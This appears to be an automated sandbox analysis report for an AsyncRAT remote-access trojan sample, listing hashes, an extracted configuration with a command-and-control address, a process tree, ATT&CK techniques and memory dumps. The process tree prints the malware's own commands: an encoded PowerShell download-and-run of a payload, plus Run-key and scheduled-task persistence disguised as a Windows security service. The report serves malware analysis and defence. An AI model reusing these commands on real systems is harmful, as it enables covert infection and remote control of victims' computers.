asyncrat | dfe55f766e02d90c2f1c1794ee9fe59d6cd3ddec6a36b03f16fcb9ee58fc8d06

Analysis

max time kernel
141s
max time network
147s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
06-12-2022 07:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dfe55f766e02d90c2f1c1794ee9fe59d6cd3ddec6a36b03f16fcb9ee58fc8d06.exe
Size

7KB
MD5

5d9fea16ab0d9224b54d72e2321bcaff
SHA1

499d709c1cbc22caf4e5efda230fb4a158714ea4
SHA256

dfe55f766e02d90c2f1c1794ee9fe59d6cd3ddec6a36b03f16fcb9ee58fc8d06
SHA512

c685ad6526099d126a47528e5230924fdf0762d2b35a0ca73afc1851ec6b4cbb931c08fcd3e419348a10365b04bb44b5561e0f191e4b4793433fd64e118049b4
SSDEEP

192:umI098QkFrDZBXvkHarSNtUqDpU4WWCmWeds:T9eb5kjNt/DgWCmW2s

Score

10^/10

asyncrat defendersmartscren persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/3584-201-0x000000000040D06E-mapping.dmp	asyncrat
behavioral1/memory/3584-200-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 3828 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

POSA12.exe

pid process

4848 POSA12.exe

flow	pid	process
7	3828	powershell.exe

pid	process
4848	POSA12.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

POSA12.exe

description pid process target process

PID 4848 set thread context of 3584 4848 POSA12.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4236 schtasks.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

3828 powershell.exe
3828 powershell.exe
3828 powershell.exe
3348 powershell.exe
3348 powershell.exe
3348 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3828 powershell.exe
Token: SeDebugPrivilege 3348 powershell.exe

description	pid	process	target process
PID 4848 set thread context of 3584	4848	POSA12.exe	RegAsm.exe

pid	process
4236	schtasks.exe

pid	process
3828	powershell.exe
3828	powershell.exe
3828	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3828	powershell.exe
Token: SeDebugPrivilege	3348	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

dfe55f766e02d90c2f1c1794ee9fe59d6cd3ddec6a36b03f16fcb9ee58fc8d06.exepowershell.exePOSA12.execmd.exe

description	pid	process	target process
PID 2832 wrote to memory of 3828	2832	dfe55f766e02d90c2f1c1794ee9fe59d6cd3ddec6a36b03f16fcb9ee58fc8d06.exe	powershell.exe
PID 2832 wrote to memory of 3828	2832	dfe55f766e02d90c2f1c1794ee9fe59d6cd3ddec6a36b03f16fcb9ee58fc8d06.exe	powershell.exe
PID 3828 wrote to memory of 4848	3828	powershell.exe	POSA12.exe
PID 3828 wrote to memory of 4848	3828	powershell.exe	POSA12.exe
PID 3828 wrote to memory of 4848	3828	powershell.exe	POSA12.exe
PID 4848 wrote to memory of 3348	4848	POSA12.exe	powershell.exe
PID 4848 wrote to memory of 3348	4848	POSA12.exe	powershell.exe
PID 4848 wrote to memory of 3348	4848	POSA12.exe	powershell.exe
PID 4848 wrote to memory of 1612	4848	POSA12.exe	cmd.exe
PID 4848 wrote to memory of 1612	4848	POSA12.exe	cmd.exe
PID 4848 wrote to memory of 1612	4848	POSA12.exe	cmd.exe
PID 4848 wrote to memory of 3584	4848	POSA12.exe	RegAsm.exe
PID 4848 wrote to memory of 3584	4848	POSA12.exe	RegAsm.exe
PID 4848 wrote to memory of 3584	4848	POSA12.exe	RegAsm.exe
PID 4848 wrote to memory of 3584	4848	POSA12.exe	RegAsm.exe
PID 4848 wrote to memory of 3584	4848	POSA12.exe	RegAsm.exe
PID 4848 wrote to memory of 3584	4848	POSA12.exe	RegAsm.exe
PID 4848 wrote to memory of 3584	4848	POSA12.exe	RegAsm.exe
PID 4848 wrote to memory of 3584	4848	POSA12.exe	RegAsm.exe
PID 1612 wrote to memory of 4236	1612	cmd.exe	schtasks.exe
PID 1612 wrote to memory of 4236	1612	cmd.exe	schtasks.exe
PID 1612 wrote to memory of 4236	1612	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\dfe55f766e02d90c2f1c1794ee9fe59d6cd3ddec6a36b03f16fcb9ee58fc8d06.exe
"C:\Users\Admin\AppData\Local\Temp\dfe55f766e02d90c2f1c1794ee9fe59d6cd3ddec6a36b03f16fcb9ee58fc8d06.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAYwBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADUANAAzADMANgAxADcANAAxADYAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGoAdABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBrAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBrAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABPAFMAQQAxADIALgBlAHgAZQAnACkAKQA8ACMAZABoAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwByAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAbABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATwBTAEEAMQAyAC4AZQB4AGUAJwApADwAIwB1AG4AcQAjAD4A"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3828

C:\Users\Admin\AppData\Roaming\POSA12.exe
"C:\Users\Admin\AppData\Roaming\POSA12.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3348

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
4⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:4236

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
4⤵
PID:3584

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ff22801b5d34510166f73422cd9f79df

SHA1
005c7983f6a3cbf4ac309e60c62829de8086dbf7

SHA256
a7bd3864ccfba0979c3e8ef421a1797de4436a81a6832f44b87011e1bdbe3af1

SHA512
de5a74d0543a5090d48a50d33dfa9a1408bbeb186f6e0cb33bd3f9a8e0ad74084eea318488d7606a96277775dd54708ad033a35d9bfb207b15385842624d6df9

Download Submit
C:\Users\Admin\AppData\Roaming\POSA12.exe
Filesize
87KB

MD5
ca699117112a173ca7b289f1baf6c3c0

SHA1
862f227d4fa0b4de892006d7fe19e610e9f1a676

SHA256
db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

SHA512
d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

Download Submit
C:\Users\Admin\AppData\Roaming\POSA12.exe
Filesize
87KB

MD5
ca699117112a173ca7b289f1baf6c3c0

SHA1
862f227d4fa0b4de892006d7fe19e610e9f1a676

SHA256
db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

SHA512
d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

Download Submit
memory/1612-189-0x0000000000000000-mapping.dmp

Download
memory/1612-192-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/1612-196-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/1612-199-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/1612-197-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/2832-115-0x0000000000570000-0x0000000000578000-memory.dmp

Filesize
32KB

Download
memory/3348-304-0x0000000007810000-0x0000000007E38000-memory.dmp

Filesize
6.2MB

Download
memory/3348-327-0x0000000008090000-0x00000000080F6000-memory.dmp

Filesize
408KB

Download
memory/3348-362-0x0000000009890000-0x00000000098AE000-memory.dmp

Filesize
120KB

Download
memory/3348-361-0x00000000098B0000-0x00000000098E3000-memory.dmp

Filesize
204KB

Download
memory/3348-341-0x0000000008AC0000-0x0000000008B36000-memory.dmp

Filesize
472KB

Download
memory/3348-375-0x0000000009DD0000-0x0000000009E64000-memory.dmp

Filesize
592KB

Download
memory/3348-334-0x00000000087A0000-0x00000000087EB000-memory.dmp

Filesize
300KB

Download
memory/3348-333-0x0000000008770000-0x000000000878C000-memory.dmp

Filesize
112KB

Download
memory/3348-330-0x00000000083E0000-0x0000000008730000-memory.dmp

Filesize
3.3MB

Download
memory/3348-578-0x0000000008C40000-0x0000000008C5A000-memory.dmp

Filesize
104KB

Download
memory/3348-328-0x0000000008370000-0x00000000083D6000-memory.dmp

Filesize
408KB

Download
memory/3348-601-0x0000000009EF0000-0x0000000009F0A000-memory.dmp

Filesize
104KB

Download
memory/3348-325-0x0000000007FF0000-0x0000000008012000-memory.dmp

Filesize
136KB

Download
memory/3348-187-0x0000000000000000-mapping.dmp

Download
memory/3348-583-0x0000000007480000-0x0000000007488000-memory.dmp

Filesize
32KB

Download
memory/3348-288-0x0000000007140000-0x0000000007176000-memory.dmp

Filesize
216KB

Download
memory/3348-188-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3348-194-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3348-190-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3348-371-0x00000000099F0000-0x0000000009A95000-memory.dmp

Filesize
660KB

Download
memory/3348-208-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3348-193-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3348-210-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3348-602-0x0000000009F40000-0x0000000009F62000-memory.dmp

Filesize
136KB

Download
memory/3584-206-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3584-205-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3584-204-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3584-202-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3584-201-0x000000000040D06E-mapping.dmp

Download
memory/3584-207-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3584-209-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3584-211-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/3584-200-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3828-124-0x00000287FE7C0000-0x00000287FE836000-memory.dmp

Filesize
472KB

Download
memory/3828-121-0x00000287E6440000-0x00000287E6462000-memory.dmp

Filesize
136KB

Download
memory/3828-116-0x0000000000000000-mapping.dmp

Download
memory/4236-250-0x0000000000000000-mapping.dmp

Download
memory/4848-159-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-164-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-184-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-185-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-186-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-182-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-181-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-180-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-179-0x0000000004FA0000-0x000000000549E000-memory.dmp

Filesize
5.0MB

Download
memory/4848-191-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-178-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-177-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-176-0x0000000000350000-0x000000000036C000-memory.dmp

Filesize
112KB

Download
memory/4848-198-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-175-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-174-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-173-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-172-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-171-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-170-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-169-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-168-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-167-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-166-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-165-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-183-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-203-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-163-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-195-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-162-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-161-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-160-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-158-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-157-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-156-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-155-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-154-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-153-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-152-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-151-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-149-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-148-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-147-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-146-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-145-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-144-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-143-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-141-0x00000000775B0000-0x000000007773E000-memory.dmp

Filesize
1.6MB

Download
memory/4848-139-0x0000000000000000-mapping.dmp

Download